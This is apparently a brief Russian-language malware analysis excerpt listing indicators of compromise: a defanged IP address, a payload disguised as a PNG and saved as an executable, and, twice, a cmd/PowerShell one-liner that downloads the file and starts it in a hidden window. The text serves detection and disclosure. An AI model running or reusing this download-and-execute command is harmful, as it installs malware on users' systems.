Техническая информация
- http://10#.#44.79.123/i5/saintvr.png как %temp%\y6s2gl.exe
- '10#.#44.79.123':80
- '<SYSTEM32>\cmd.exe' /c powershell (new-object System.Net.WebClienT).DownloadFile('http://10#.#44.79.123/i5/SaintVR.png','%temp%\y6s2gl.exe'); Start '%temp%\y6s2gl.exe'' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c powershell (new-object System.Net.WebClienT).DownloadFile('http://10#.#44.79.123/i5/SaintVR.png','%temp%\y6s2gl.exe'); Start '%temp%\y6s2gl.exe'